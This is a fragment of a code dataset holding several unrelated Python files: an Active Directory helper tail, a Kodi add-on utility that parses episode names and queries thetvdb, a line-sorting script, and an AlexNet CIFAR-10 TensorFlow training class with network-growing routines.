\"Active Directory\", \"Не заблокирован\", \"Техническая ошибка\", datetime.now().strftime(\"%H:%M:%S\")])\r\n try:\r\n f = wmi.WMI()\r\n for p in f.Win32_Process():\r\n if p.name == 'mmc.exe':\r\n p.Terminate()\r\n except Exception as e:\r\n print(e)\r\ndef get_profile_name(name):\r\n name2 = name.split(' ')\r\n name_variants=[]\r\n result = \"\"\r\n for i in range(len(name2)):\r\n if i:\r\n result+=' '+name2[i]\r\n else: result+=name2[i]\r\n name_variants.append(result)\r\n print(name_variants)\r\n return name_variants\r\n\r\n\r\n","sub_path":"AD.py","file_name":"AD.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"499221336","text":"from resources.scrapers import scrapers\nimport urllib2\nimport os.path\nimport xbmc\nimport xbmcaddon\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n \n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n \n return False\n\ndef isThatSxxExx (string):\n if (len(string) != 6) and (len(string) != 3):\n return False\n else:\n if (len(string) == 6):\n if (string[0].isdigit() == True):\n return False\n elif (string[1].isdigit() == False):\n return False\n elif(string[2].isdigit() == False):\n return False\n elif (string[3].isdigit() == True):\n return 
False\n            elif (string[4].isdigit() == False):\n                return False\n            elif (string[5].isdigit() == False):\n                return False\n            else:\n                return True\n        elif (len(string) == 3):\n            if (string[0].isdigit() == False):\n                return False\n            elif (string[1].isdigit() == False):\n                return False\n            elif(string[2].isdigit() == False):\n                return False\n            else:\n                return True\n\ndef extract(text, startText, endText):\n    start=text.find(startText,0)\n    if start!=-1:\n        start=start+startText.__len__()\n        end=text.find(endText,start+1)\n        if end!=-1:\n            return text[start:end]\n    return None\n\ndef extractAll(text, startText, endText):\n    result = []\n    start = 0\n    pos = text.find(startText, start)\n    while pos != -1:\n        start = pos + startText.__len__()\n        end = text.find(endText, start)\n        result.append(text[start:end].replace('\\n', '').replace('\\t', '').lstrip())\n        pos = text.find(startText, end)\n    return result\n\ndef getEpisodeandSeason (SxxExx):\n    string = list(SxxExx)\n    Season = int('0')\n    Episode = int('0')\n    SeasonEpisode = []\n    if (len(SxxExx) == 6):\n        Season = int(string[1])*10 + int(string[2])\n        Episode = int(string[4])*10 + int(string[5])\n    if (len(SxxExx) == 3):\n        Season = int(string[0])\n        Episode = int(string[1])*10 + int(string[2])\n\n    SeasonEpisode = [Season, Episode]\n    return SeasonEpisode\n\ndef getRealNames (title):\n\tchange = True\n\tstrDummy = title\n\tstrDummy = title.replace(\".\", \" \")\n\treturnedTitle = ''\t\t\n\tlistString = strDummy.split()\n\tShowName = '' \t\t\n\tSxxExx = '' \t\t\n\tfor i in listString:\n\t\tif (change == True):\n\t\t\tif (isThatSxxExx(i) == True):\n\t\t\t\tchange = False\n\t\t\t\tShowName = returnedTitle\n\t\t\t\tSxxExx = i\n\t\t\treturnedTitle = returnedTitle + i + ' '\n\t\t\t\n\tnames = [ShowName, SxxExx, returnedTitle]\t\t\n\treturn names\t\n\ndef isvalid (title):\n    checkstring = title\n    if (checkstring.find('.srt') != -1):\n        return False\n    if (checkstring.find('.png') != -1):\n        return False\n    if (checkstring.find('.jpg') != -1):\n        return False\n    if (checkstring.find('.png') != -1):\n        return False\n    if (checkstring.find('.txt') != -1):\n        return False\n    if (checkstring.find('.nfo') != -1):\n        return False\n    return True\n\n\ndef textDB (Showname):\n    __addon__ = xbmcaddon.Addon(id='plugin.video.torrenter')\n    __addonprofile__= xbmc.translatePath(__addon__.getAddonInfo('profile')).decode('utf-8')\n    filename = __addonprofile__ + Showname+\".txt\"\n    if os.path.exists(filename) == False:\n        show_file = open(filename, \"w\")\n        showstr = Showname.replace(\" \", \"+\")\n        url = \"http://thetvdb.com/api/GetSeries.php?seriesname=\"\n        url = url+showstr\n        response = urllib2.urlopen(url)\n        content = response.read()\n        id = extract(content, '<seriesid>', '</seriesid>')\n        urln = \"http://thetvdb.com/api/CEE06027D4C29B06/series/\"+str(id)+\"/all/he.xml\"\n        responsen = urllib2.urlopen(urln)\n        contentn = responsen.read()\n        show_file.write(contentn)\n        show_file.close()\n\n    show_file = open(filename, 'r')\n    database = show_file.read()\n    show_file.close() \n    return database\n\ndef getInfo (seriesname):\n    checkstring = seriesname\n    name = seriesname\n    plot = 'none'\n    aired = 'none'\n    thumbnail = ''\n    Anames = getRealNames(seriesname)\n    if isvalid(seriesname) == True:\n        if isThatSxxExx(Anames[1]) == True:\n            contentn = textDB(Anames[0])\n            paragraphs = extractAll(contentn, '<Episode>', '</Episode>')\n            SeasonEpisode = getEpisodeandSeason(Anames[1])\n            SeasonNumber = str(SeasonEpisode[0])\n            EpisodeNumber = str(SeasonEpisode[1])\n            EpisodeStart = '<EpisodeNumber>'\n            EpisodeEnd = '</EpisodeNumber>'\n            SeasonStart = '<SeasonNumber>'\n            SeasonEnd = '</SeasonNumber>'\n            episodeoptionone = EpisodeStart+EpisodeNumber+EpisodeEnd\n            episodeoptiontwo = 
EpisodeStart+EpisodeNumber+'.0'+EpisodeEnd\n            for i in paragraphs:\n                if episodeoptionone in i or episodeoptiontwo in i: \n                    if SeasonStart+SeasonNumber+SeasonEnd in i:\n                        plot = extract(i, '<Overview>', '</Overview>')\n                        plot = plot.replace(\"&quot;\", '\"')\n                        name = Anames[1]+\" \"+extract(i, '<EpisodeName>', '</EpisodeName>')\n                        thumbnail = 'http://thetvdb.com/banners/'+extract(i, '<filename>', '</filename>')\n\t\t\t\n    info = [name, plot, thumbnail]\n    return info\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"73946314","text":"with open(\"input_sort_count.txt\",mode=\"r\",encoding=\"utf-8\") as infile:\n    word=infile.read()\n\nlistword=word.split('\\n') # convert to a list\n\nwhile '' in listword: # remove blank lines\n    listword.remove('')\n\nimport re\nl1=[re.sub(r\"\\t.*$|\\s.*$\",r\"\",i) for i in listword] # strip everything from the first tab/space onward (the trailing code), keeping the leading text whose characters we count\n\nlenl1=[len(line) for line in l1]\n\nlistall=list(zip(lenl1,listword)) # pair each character count with its original line # this pairing does not merge identical items\n\nlistall=sorted(listall,key=lambda x:x[0]) # order by character count # like Excel: the sort is stable, so ties keep their original order\n\nn, v = zip(*listall) # unzip back into two lists (actually two tuples)\nv=\"\\n\".join(v) # join back into a single string\n\nwith open(\"output_1_sort_count.txt\",mode=\"w\",encoding=\"utf-8\") as outfile:\n    outfile.write(v)\n","sub_path":"Sort by word count and name/1_sort_by_word_count_與excel相似.py","file_name":"1_sort_by_word_count_與excel相似.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"269712334","text":"######################################################\n# Alexnet on CIFAR10\n# by: xdai @ 05/15/2017\n######################################################\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\n\nimport keras\nimport time\nimport gc\nfrom keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimport prepare_cifar10\nfrom lib.mathOperation import randMask, rRangedMask, softmax, d_softmax, empty_count\nfrom lib.mathOperation import normalize, conv2d, conv2drelu, maxpool2d\nfrom lib.img_lib import deform, deskew, resize, dist_lecun, load_dist_mnist\nfrom nets.cifar10_nets import alexnet_cifar10\nfrom lib.visual import six_figures\t\n\nfrom config import *\n\ndata_file = '/home/xdai/cifar10/'\n\n#cifar10 = prepare_cifar10.read_data_sets(reshape=False)\ncategories = [\"airplane\", \"automobile\", \"bird\", \"cat\", \"deer\", \"dog\", \"frog\", \"horse\", \"ship\", \"truck\"]\n\nETA = 0.08\nEPSINIT = 0.05\nBATCHSIZE = 32\nL2_NORM = 0.000001\n\nclass tf_classifier():\n\tdef __init__(self, bridge=False, eta=ETA, epsinit=EPSINIT, batchsize=BATCHSIZE, show=True):\n\t\tself.bridge = bridge\n\t\tself.eta = eta\n\t\tself.epsinit = epsinit\n\t\tself.batchsize = batchsize\n\t\tself.valbatchsize = 500\n\t\tself.show = show\n\n\t\tself.tsave = 100000\n\t\tself.tshow = 5000\n\t\tself.tmax = 15000000\n\t\tself.tnow = 0\n\t\tself.t0 = time.time()\n\n\t\tself.beta = L2_NORM\n\t\tself.train_error = 1.0\n\t\tself.record = 0.5\n\t\tself.monitor = [[0.,0.,0.,0.]]\n\n\t\tself.stage = 0 # 0-> child 1-> teen 2->adult\n\n\tdef setData(self):\n\t\t(self.x_train, self.y_train), (self.x_test, self.y_test) = cifar10.load_data()\n\t\tself.y_train = np_utils.to_categorical(self.y_train, 10)\n\t\tself.y_test = np_utils.to_categorical(self.y_test, 10)\n\n\t\tself.train_datagen = ImageDataGenerator(\n\t\t\tfeaturewise_center=False, # set 
input mean to 0 over the dataset\n\t\t\tsamplewise_center=False, # set each sample mean to 0\n\t\t\tfeaturewise_std_normalization=False, # divide inputs by std of the dataset\n\t\t\tsamplewise_std_normalization=False, # divide each input by its std\n\t\t\tzca_whitening=False, # apply ZCA whitening\n\t\t\trotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n\t\t\twidth_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n\t\t\theight_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n\t\t\tzoom_range=0.2,\n\t\t\thorizontal_flip=True, # randomly flip images\n\t\t\tvertical_flip=False) # randomly flip images\n\t\tself.train_datagen.fit(self.x_train)\n\n\t\tself.vali_datagen = ImageDataGenerator(\n\t\t\tfeaturewise_center=False, # set input mean to 0 over the dataset\n\t\t\tsamplewise_center=False, # set each sample mean to 0\n\t\t\tfeaturewise_std_normalization=False, # divide inputs by std of the dataset\n\t\t\tsamplewise_std_normalization=False, # divide each input by its std\n\t\t\tzca_whitening=False, # apply ZCA whitening\n\t\t\trotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n\t\t\twidth_shift_range=0.0, # randomly shift images horizontally (fraction of total width)\n\t\t\theight_shift_range=0.0, # randomly shift images vertically (fraction of total height)\n\t\t\thorizontal_flip=False, # randomly flip images\n\t\t\tvertical_flip=False) # randomly flip images\n\t\tself.vali_datagen.fit(self.x_test)\n\n\t\tgc.collect()\n\t\tprint('Data loading complete!')\n\t\treturn None\n\n\tdef net_eval(self, x, weights, msk, biases, train_phase):\n\t\tx = tf.reshape(x, shape=[-1, 32, 32, 3])\n\t\tx3 = alexnet_cifar10(x, weights, msk, biases, train_phase)\n\t\treturn x3\n\n\tdef net(self, x, weights, msk, biases, train_phase):\n\t\tx = tf.reshape(x, shape=[-1, 32, 32, 3])\n\t\tx3 = alexnet_cifar10(x, weights, msk, biases, train_phase)\n\t\treturn x3\n\n\tdef eval_validation(self):\n\t\tcost = np.zeros(20)\n\t\terrcl = np.zeros(20)\n\t\ti = 0\n\t\tfor x_vali, y_vali in self.vali_datagen.flow(self.x_test, self.y_test, batch_size=self.valbatchsize, shuffle=False):\n\t\t\tcost[i], errcl[i] = self.sess.run([self.cost_eval, self.errorrate_eval], \n\t\t\t\tfeed_dict={self.x: x_vali, self.y: y_vali, self.lrate:self.eta, self.train_phase: False})\n\t\t\ti += 1\n\t\t\tif i == 19:\n\t\t\t\tbreak\n\t\treturn cost.mean(), errcl.mean()\n\n\tdef initStruct(self, load=False):\n\t\tprint('Structure and TF initializing')\n\t\tself.i0 = 32\n\t\tself.c1 = 64\n\t\tself.c2 = 64\n\t\tself.n0 = 1600\n\t\tself.n1, self.N1 = 512, 512\n\t\tself.n2, self.N2 = 256, 256\n\t\tself.n3 = 10\n\t\tself.n4 = 10\n\n\t\tself.ntotal = self.n1 + self.n2\n\n\t\tself.n1_addProb = ( self.n0*self.n1 / pow((self.n1 + self.n2), 2.))\n\t\tself.n2_addProb = ( self.n0*self.n2 / pow((self.n1 + self.n2), 2.))\n\t\tmax_prob = max(self.n1_addProb, self.n2_addProb)\n\t\tself.n1_addProb /= max_prob\n\t\tself.n2_addProb /= max_prob\n\t\tprint('n1_addProb: ', self.n1_addProb)\n\t\tprint('n2_addProb: ', self.n2_addProb)\n\n\t\tself.sess = tf.InteractiveSession()\n\n\t\tself.info = 'Dataset: CIFAR10\\nLayer info:\\n' + str(self.n0) + '*' + str(self.n1) + '*'+ str(self.n2) + '*' + str(self.n3) + '\\n'\n\n\t\tself.msk = {\n\t\t\t'm1': tf.Variable(rRangedMask(self.n0, self.n1, self.n0, self.N1, percent=1.), trainable=False, dtype=tf.float32, name='m1'),\n\t\t\t'm2': tf.Variable(rRangedMask(self.n1, self.n2, self.N1, self.N2, percent=1.), trainable=False, 
dtype=tf.float32, name='m2'),\n\t\t\t'm3': tf.Variable(rRangedMask(self.n2, self.n3, self.N2, self.n3, percent=1.), trainable=False, dtype=tf.float32, name='m3'),\n\t\t\t}\n\t\tself.weights = {\n\t\t\t'cw1': tf.Variable(tf.random_normal([5, 5, 3, 64], stddev=self.epsinit), name='cw1'),\n\t\t\t'cw2': tf.Variable(tf.random_normal([5, 5, 64, 64], stddev=self.epsinit), name='cw2'),\n\t\t\t'w1': tf.Variable(tf.multiply(tf.random_normal([self.n0, self.N1], stddev=self.epsinit), self.msk['m1'].initialized_value()), name='w1'),\n\t\t\t'w2': tf.Variable(tf.multiply(tf.random_normal([self.N1, self.N2], stddev=self.epsinit), self.msk['m2'].initialized_value()), name='w2'),\n\t\t\t'w3': tf.Variable(tf.multiply(tf.random_normal([self.N2, self.n3], stddev=self.epsinit), self.msk['m3'].initialized_value()), name='w3'),\n\t\t\t'w02': tf.Variable(tf.zeros([self.n0, self.N2]), name='w02'),\n\t\t\t'w13': tf.Variable(tf.zeros([self.N1, self.n3]), name='w13'),\n\t\t\t}\n\t\tself.biases = {\n\t\t\t'cb1': tf.Variable(tf.zeros([64]), name='cb1'),\n\t\t\t'cb2': tf.Variable(tf.zeros([64]), name='cb2'),\n\t\t\t'b1': tf.Variable(tf.zeros([self.N1]), name='b1'),\n\t\t\t'b2': tf.Variable(tf.zeros([self.N2]), name='b2'),\n\t\t\t'b3': tf.Variable(tf.zeros([self.n3]), name='b3'),\n\t\t\t}\n\n\t\tself.saver = tf.train.Saver()\n\t\tself.save_path = '/home/xdai/Desktop/model_saved/model.ckpt'\n\n\t\t# input and output (fixed: list.insert mutates in place and returns None, so\n\t\t# the original shape argument was silently None; float32 is also required for\n\t\t# the augmented image batches and for softmax_cross_entropy_with_logits labels)\n\t\tself.x = tf.placeholder(tf.float32, [None, 32, 32, 3])\n\t\tself.y = tf.placeholder(tf.float32, [None, self.n4])\n\n\t\tself.train_phase = tf.placeholder(tf.bool, shape=[])\n\t\tself.lrate = tf.placeholder(tf.float32, shape=[])\n\n\t\t# main MLP structure optimizer\n\t\tself.pred = self.net(self.x, self.weights, self.msk, self.biases, self.train_phase)\n\t\tself.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred, labels=self.y))\n\t\tself.regularizer = tf.nn.l2_loss(self.weights['w1']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['w2']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['w3']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['cw1']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['cw2'])\n\t\tself.cost = tf.reduce_mean(self.cost + self.beta*self.regularizer)\n\t\tself.optimizer = tf.train.MomentumOptimizer(learning_rate=self.lrate, momentum=0.2).minimize(self.cost)\n\t\tself.err_pred = tf.not_equal(tf.argmax(self.pred, 1), tf.argmax(self.y, 1))\n\t\tself.errorrate = tf.reduce_mean(tf.cast(self.err_pred, tf.float32))\n\n\t\tself.pred_eval = self.net_eval(self.x, self.weights, self.msk, self.biases, self.train_phase)\n\t\tself.cost_eval = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred_eval, labels=self.y))\n\t\tself.err_pred_eval = tf.not_equal(tf.argmax(self.pred_eval, 1), tf.argmax(self.y, 1))\n\t\tself.errorrate_eval = tf.reduce_mean(tf.cast(self.err_pred_eval, tf.float32))\n\n\t\t# gradient computation network\n\t\t# self.pred_full = self.net_full(self.x, self.weights, self.biases)\n\t\t# self.cost_full = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred_full, labels=self.y))\n\t\t# self.gradient = tf.train.GradientDescentOptimizer(learning_rate=0.01).compute_gradients(self.cost_full)\n\n\t\t# initialization\n\t\tif load == True:\n\t\t\tinit = tf.global_variables_initializer()\n\t\t\tself.sess.run(init)\n\t\t\tself.saver.restore(self.sess, self.save_path)\n\t\t\tprint(\"Load = True, Model Restored! 
\")\n\t\telse:\n\t\t\tinit = tf.global_variables_initializer()\n\t\t\tself.sess.run(init)\n\t\t\tprint(\"Load = False, TF Variable Initialized! \")\n\n\t\tself.errsq = np.zeros(self.tshow)\n\t\tself.errcl = np.zeros(self.tshow)\n\n\t\tself.errcltrain = np.zeros(self.tmax//self.tshow)\n\t\tself.errsqtrain = np.zeros(self.tmax//self.tshow)\n\t\tself.errclvalidate = np.ones(self.tmax//self.tshow)\n\n\t\tself.displayBoard = six_figures(show = True)\n\n\t\tprint('Initialization Complete!')\n\t\treturn self.ntotal\n\n\tdef learn(self, t_train):\n\t\tt = self.tnow\n\t\t#for t in xrange(self.tnow, self.tnow + t_train):\n\t\twhile t < (self.tnow + t_train):\n\t\t\t#x_batch, y_batch = self.cifar_data.train.next_batch(self.batchsize)\n\t\t\tfor x_batch, y_batch in self.train_datagen.flow(self.x_train, self.y_train, batch_size=self.batchsize):\n\t\t\t\tself.errsq[t%self.tshow], self.errcl[t%self.tshow] = self.sess.run([self.cost_eval, self.errorrate_eval], \n\t\t\t\t\tfeed_dict={self.x: x_batch, self.y: y_batch, self.lrate:self.eta, self.train_phase: True})\n\t\t\t\tself.sess.run(self.optimizer, \n\t\t\t\t\tfeed_dict={self.x: x_batch, self.y: y_batch, self.lrate:self.eta, self.train_phase: True})\n\t\t\t\t\n\t\t\t\tt += 1\n\t\t\t\tif (t % self.tshow == 0 and t > 0) or t > (self.tnow + t_train):\n\t\t\t\t\tbreak\n\n\t\t\tself.eta *= 0.997\n\t\t\tmonitor = []\n\t\t\tself.train_error = np.sum(self.errcl) / self.tshow\n\t\t\tself.train_sqerror = np.sum(self.errsq) / self.tshow\n\t\t\t_, self.errclvalidate[t//self.tshow - 1] = self.eval_validation()\n\n\t\t\tprint ('current iteration: ', t)\n\t\t\tprint ('current time: ', time.time() - self.t0)\n\t\t\tprint ('current train_error: ', self.train_error)\n\t\t\tprint ('current vali_error: ', self.errclvalidate[t//self.tshow - 1])\n\n\t\t\tself.errcltrain[t//self.tshow - 1] = self.train_error\n\t\t\tself.errsqtrain[t//self.tshow - 1] = self.train_sqerror\n\n\t\t\tinfo = self.info + 'eta: %.3f \\ntime:%.2f \\n%d, %d, %d, %d' \\\n\t\t\t%(self.eta, time.time() - self.t0, self.n0, self.n1, self.n2, self.n3)\n\t\t\tself.displayBoard.draw(idx=0, mode='text', data=info)\n\n\t\t\tw = np.sign(np.absolute(self.sess.run(self.weights['w1'])))\n\t\t\tself.displayBoard.draw(idx=1, mode='imshow', data=w, title=str(np.count_nonzero(w)))\n\t\t\tmonitor.append(np.count_nonzero(w))\n\n\t\t\tw = np.sign(np.absolute(self.sess.run(self.weights['w2'])))\n\t\t\tself.displayBoard.draw(idx=2, mode='imshow', data=w, title=str(np.count_nonzero(w)))\n\t\t\tmonitor.append(np.count_nonzero(w))\n\n\t\t\tw = np.sign(np.absolute(self.sess.run(self.weights['w3'])))\n\t\t\tself.displayBoard.draw(idx=3, mode='imshow', data=w, title=str(np.count_nonzero(w)))\n\t\t\tmonitor.append(np.count_nonzero(w))\n\n\t\t\tm1 = self.msk['m1'].eval()\n\t\t\tm2 = self.msk['m2'].eval()\n\t\t\tmonitor.append(self.N1 + self.N2 - empty_count(m1.T) - empty_count(m2.T))\n\n\t\t\tself.monitor.append(monitor)\n\t\t\tself.displayBoard.draw(idx=4, mode='curve', data=np.array(self.monitor)[:, 0], title='num of conn')\n\n\t\t\tself.displayBoard.draw(idx=5, mode='twocurve', data=self.errcltrain[: t//self.tshow], title=str(t), data2=self.errclvalidate[: t//self.tshow], )\t\n\t\t\tself.displayBoard.display()\n\n\t\t\tgc.collect()\n\n\t\t\tif self.errclvalidate[t//self.tshow - 1] < self.record:\n\t\t\t\tself.record = self.errclvalidate[t//self.tshow - 1]\n\t\t\t\tsave = self.saver.save(self.sess, self.save_path)\n\t\t\t\tprint(('Model saved in file: %s' %save))\n\t\t\t\n\t\t\tprint('Current record: ', self.record)\n\t\t\tprint 
('\\n')\n\t\tself.tnow += t_train\n\t\tself.displayBoard.save()\n\t\treturn self.record, self.train_error\n\n\tdef minibatchGradient(self, x, y):\n\t\t_gradient = self.sess.run(self.gradient, feed_dict={self.x: x, self.y: y})\n\t\treturn [-np.array(_gradient[2][0]),\n\t\t\t\t-np.array(_gradient[3][0]),\n\t\t\t\t-np.array(_gradient[4][0]),\n\t\t\t\t-np.array(_gradient[5][0]),\n\t\t\t\t-np.array(_gradient[6][0])\n\t\t\t\t]\n\n\tdef computeGradient(self):\n\t\tprint('Computing Gradient...')\n\t\t_batch = 600\n\t\tgrdwd1 = np.zeros([self.n0, self.N1])\n\t\tgrdwd2 = np.zeros([self.N1, self.N2])\n\t\tgrdwd3 = np.zeros([self.N2, self.n3])\n\t\tgrdwd02 = np.zeros([self.n0, self.N2])\n\t\tgrdwd13 = np.zeros([self.N1, self.n3])\n\t\t_total_iter = int(self.mtrain / _batch)\n\n\t\tprint('Batch size: ', _batch)\n\t\tprint('Total iteration: ', _total_iter)\n\n\t\tfor i in range (_total_iter):\n\t\t\t_start = i * _batch\n\t\t\t_end = (i+1) * _batch\n\t\t\t_gradient = self.minibatchGradient(self.x_train[_start:_end], self.y_train[_start:_end])\n\t\t\tgrdwd1 += _gradient[0]\n\t\t\tgrdwd2 += _gradient[1]\n\t\t\tgrdwd3 += _gradient[2]\n\t\t\tgrdwd02 += _gradient[3]\n\t\t\tgrdwd13 += _gradient[4]\n\n\t\tgrdwd1 /= float(_total_iter)\n\t\tgrdwd2 /= float(_total_iter)\n\t\tgrdwd3 /= float(_total_iter)\n\t\tgrdwd02 /= float(_total_iter)\n\t\tgrdwd13 /= float(_total_iter)\n\n\t\treturn [grdwd1, grdwd2, grdwd3, grdwd02, grdwd13]\n\n\tdef computeLossFunc(self):\t\n\t\tcost, err = self.sess.run([self.cost, self.errorrate], feed_dict={self.x: self.x_train[:self.mtrain_raw], self.y: self.y_train[:self.mtrain_raw]})\n\t\tprint('Loss func: ', cost)\n\t\tprint('Train error: ', err)\n\t\treturn cost\n\n\tdef addNeuron(self):\n\t\tself.computeLossFunc()\n\t\tGradient = self.computeGradient()\n\n\t\tgrdwd1 = np.array(Gradient[0])[:self.n0, :self.n1]\n\t\tgrdwd2 = np.array(Gradient[1])[:self.n1, :self.n2]\n\t\tgrdwd3 = np.array(Gradient[2])[:self.n2, :self.n3]\n\t\tgrdwd02 = np.array(Gradient[3])[:self.n0, :self.n2]\n\t\tgrdwd13 = np.array(Gradient[4])[:self.n1, :self.n3]\n\t\t\t\t\t\t\t\t\t\n\t\tmatw1 = self.weights['w1'].eval()\n\t\tmatw2 = self.weights['w2'].eval()\n\t\tmatw3 = self.weights['w3'].eval()\n\n\t\tmatm1 = self.msk['m1'].eval()\n\t\tmatm2 = self.msk['m2'].eval()\n\t\tmatm3 = self.msk['m3'].eval()\n\n\t\tavew1 = np.sum(np.absolute(matw1)) / np.count_nonzero(matm1) # TBD: n0*n1 or count_non_zero\n\t\tavew2 = np.sum(np.absolute(matw2)) / np.count_nonzero(matm2)\n\t\tavew3 = np.sum(np.absolute(matw3)) / np.count_nonzero(matm3)\t\n\n\t\tif np.random.rand() <= 1.:\n\t\t\tratio = 0.12\n\n\t\t\tthreshold = np.percentile(np.absolute(grdwd02), (1-ratio)*100)\n\t\t\tgrdwd02_filt = np.multiply(np.round(0.5*np.sign(np.absolute(grdwd02)-threshold) + 0.5), grdwd02)\t\n\n\t\t\tgrdwd02_ssf = np.multiply(np.sign(grdwd02_filt), np.sqrt(np.absolute(grdwd02_filt))) # signed,sqrted,filtered\n\n\t\t\t#sign_msk = np.sign(np.sign(dRdu2) + 0.1) # remove '0' sign\n\t\t\tsign_msk = np.sign(np.sign(np.random.randn(self.n2)) + 0.1)\n\n\t\t\tout_conn = np.sum(np.multiply(grdwd02_ssf, sign_msk), axis=0) # +- depends on avg.dRdu2\n\t\t\tin_conn = np.sum(np.multiply(grdwd02_ssf, np.sign(out_conn)), axis=1)\n\t\t\t\n\t\t\tout_conn = avew2*out_conn/(np.absolute(out_conn)).mean()\n\t\t\tin_conn = avew1*in_conn/(np.absolute(in_conn)).mean()\n\n\t\t\tmatw1[:, self.n1] = in_conn\n\t\t\tmatw2[self.n1, :self.n2] = out_conn\n\t\n\t\t\tmatm1[:, self.n1] = np.sign(np.absolute(in_conn))\n\t\t\tmatm2[self.n1, :self.n2] = 
np.sign(np.absolute(out_conn))\n\n\t\t\tself.n1 += 1\n\n\t\tif np.random.rand() <= 1.:\n\t\t\tratio = 0.20\n\n\t\t\tthreshold = np.percentile(np.absolute(grdwd13), (1-ratio)*100)\n\t\t\tgrdwd13_filt = np.multiply(np.round(0.5*np.sign(np.absolute(grdwd13)-threshold) + 0.5), grdwd13)\t\n\n\t\t\tgrdwd13_ssf = np.multiply(np.sign(grdwd13_filt), np.sqrt(np.absolute(grdwd13_filt)))\n\t\t\t\n\t\t\t#sign_msk = np.sign(np.sign(dRdu3) + 0.1) # remove '0' sign\n\t\t\tsign_msk = np.sign(np.sign(np.random.randn(self.n3)) + 0.1)\n\n\t\t\tout_conn = np.sum(np.multiply(grdwd13_ssf, sign_msk), axis=0) # +- depends on avg.dRdu2\n\t\t\tin_conn = np.sum(np.multiply(grdwd13_ssf, np.sign(out_conn)), axis=1)\n\t\t\t\n\t\t\tout_conn = avew3*out_conn/(np.absolute(out_conn)).mean()\n\t\t\tin_conn = avew2*in_conn/(np.absolute(in_conn)).mean()\n\n\t\t\tmatw2[:len(in_conn), self.n2] = in_conn\n\t\t\tmatw3[self.n2, :self.n3] = out_conn\n\t\n\t\t\tmatm2[:len(in_conn), self.n2] = np.sign(np.absolute(in_conn))\n\t\t\tmatm3[self.n2, :self.n3] = np.sign(np.absolute(out_conn))\n\n\t\t\tself.n2 += 1\n\n\t\tassign1 = self.msk['m1'].assign(matm1)\n\t\tassign2 = self.msk['m2'].assign(matm2)\n\t\tassign3 = self.msk['m3'].assign(matm3)\n\n\t\tself.sess.run(assign1)\n\t\tself.sess.run(assign2)\n\t\tself.sess.run(assign3)\n\n\t\tassign1 = self.weights['w1'].assign(matw1)\n\t\tassign2 = self.weights['w2'].assign(matw2)\n\t\tassign3 = self.weights['w3'].assign(matw3)\n\n\t\tself.sess.run(assign1)\n\t\tself.sess.run(assign2)\n\t\tself.sess.run(assign3)\n\n\t\tself.computeLossFunc()\n\n\t\tprint('\\n')\n\n\tdef addConn(self, addRatio):\n\t\tkey_m = ['m1', 'm2', 'm3']\n\t\tw_size = [self.n0 * self.n1, self.n1 * self.n2, self.n2 * self.n3]\n\n\t\tGradient = self.computeGradient()\n\n\t\tfor i in range (len(key_m)):\n\t\t\tgrdw = np.absolute(np.array(Gradient[i]))\n\t\t\tmatm = self.msk[key_m[i]].eval()\n\n\t\t\tmin_conn = addRatio[i]*w_size[i]\n\t\t\tthreshold = np.partition(grdw.flatten(), -int(min_conn))[-int(min_conn)]\n\t\t\tif threshold == 0:\n\t\t\t\tprint('Warning: threshold for conn adding is 0! ')\n\t\t\tmatm = np.sign(np.round(0.5*np.sign(np.subtract(grdw, threshold)) + 0.5) + matm)\n\n\t\t\tassign = self.msk[key_m[i]].assign(matm)\n\t\t\tself.sess.run(assign)\n\n\tdef rmConn(self, ratio=[0. for i in range (5)]):\n\t\tkey_m = ['m1', 'm2', 'm3']\n\t\tkey_w = ['w1', 'w2', 'w3']\n\n\t\tfor i in range (len(key_m)):\n\t\t\tmatw = self.weights[key_w[i]].eval()\n\n\t\t\t_index = ratio[i]*np.count_nonzero(matw)\n\t\t\tthreshold = np.partition( np.absolute(matw).flatten(), -int(_index) )[-int(_index)]\n\t\t\tif threshold == 0:\n\t\t\t\tprint('Warning: threshold for rm adding is 0! 
')\n\t\t\tmatm = np.round(0.5*np.sign(np.absolute(matw)-threshold) + 0.5)\n\t\t\tmatw = np.multiply(matm, matw)\n\n\t\t\tassign = self.weights[key_w[i]].assign(matw)\n\t\t\tself.sess.run(assign)\n\n\t\t\tassign = self.msk[key_m[i]].assign(matm)\n\t\t\tself.sess.run(assign)\n\n\tdef show_monitor(self):\n\t\tprint(self.monitor)\n\nif __name__ == '__main__':\n\ttf_model = tf_classifier()\n\ttf_model.setData()\n\ttotal_neuron = tf_model.initStruct(load=False)\t\n\tfor i in range (100):\n\t\ttf_model.learn(100000)\n\ttf_model.show_monitor()\n","sub_path":"alexnet_cifar10_keras.py","file_name":"alexnet_cifar10_keras.py","file_ext":"py","file_size_in_byte":17915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"532820345","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2015 Alexandre Villela (SleX) \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be 